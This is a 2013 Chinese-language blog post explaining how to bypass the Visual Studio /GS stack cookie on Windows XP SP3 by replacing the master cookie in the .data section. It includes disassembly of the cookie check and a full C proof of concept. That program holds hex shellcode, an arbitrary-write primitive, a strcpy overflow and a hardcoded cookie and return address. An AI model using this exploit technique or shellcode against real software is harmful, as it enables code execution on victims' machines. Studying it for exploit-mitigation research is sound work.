zcc1414

博客园 首页 联系 订阅 管理
替换.DATA的COOKIE突破GS


首先   如果想直接覆盖  一场回调函数去劫持EXE的话 ,SafeSEH会阻止程序去执行;

SafeSEH的原理很简单,就是对要调用的异常回调函数进行一系列对的有效性校验    需要 操作系统XP SP2 及后续版本 和编译器的双重支持

下面说明GS的突破

 但感觉还是有点困难:    1  要么程序写了虚函数   2要么程序主动去修改 COOKIE的值·  3 最好的方法直接覆盖 SEH  典型SEH  溢出即可

···感觉不会再爱了



 加了GS后  取的COOKIE:

00401000    55              push ebp
00401001    8BEC            mov ebp,esp
00401003    81EC E4000000   sub esp,0xE4
00401009    A1 00304000     mov eax,dword ptr ds:[0x403000]
//取.data段数据  下面于 ebp 相xor  得到  cookie
0040100E    33C5            xor eax,ebp
00401010    8945 FC         mov dword ptr ss:[ebp-0x4],eax
00401013    817D 0C 9599000>cmp dword ptr ss:[ebp+0xC],0x9995
0040101A    0F8D AA000000   jge vs2005TE.004010CA

开始时将 0x403000 处取出COKIE值,然后与EBP做一次异或放入 EBP-4的位置作为 此函数的Security Cookie


函数返回前的校验就是此过程的逆过程,程序将

1   EBP-4的位置取出值,

2  然后与EBP异或

3  最后于 0x00403000处的COOKIE相比较


源码为: 

/*
XP SP3   
VS2008   GS保护  禁止优化
*/
#include <stdafx.h>
#include <windows.h>

char shellcode[]=



"\x90\x90\x90\x90"

"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53"
"\x68\x64\x61\x30\x23"
"\x68\x23\x50\x61\x6E"
"\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"//168

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//注意这里  尽量将90放在后面  放在前面有问题!!!
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90"
"\xf4\x6f\x82\x90"	//cookie 90826FF4  倒叙  我是通过 编码直接得到  是单个字节xor
"\x90\x90\x90\x90"	//ebp  原来是  0012ff64
"\x94\xFE\x12\x00"	//0012FE94 为返回地址  
;


void test(char * S,int i,char * src)
{
	char dest[200];
	if (i<0x9995)
	{
		char * buf = S+i;
		*buf = *src;
		*(buf+1) = *(src+1);
		*(buf+2) = *(src+2);
		*(buf+3) = *(src+3);
		strcpy(dest,src);
	}
}

int main()
{
	char * str = (char *)malloc(0x10000);
	test(str,0xFFFF2FB8,shellcode);
	//.data   0x403000
	//malloc  0x410048  相减 D048     
	//FFFFFFFF - D048  + 1= FFFF2FB8
}

最后成功:



posted on 2013-09-08 18:30  zcc1414  阅读(195)  评论(0编辑  收藏  举报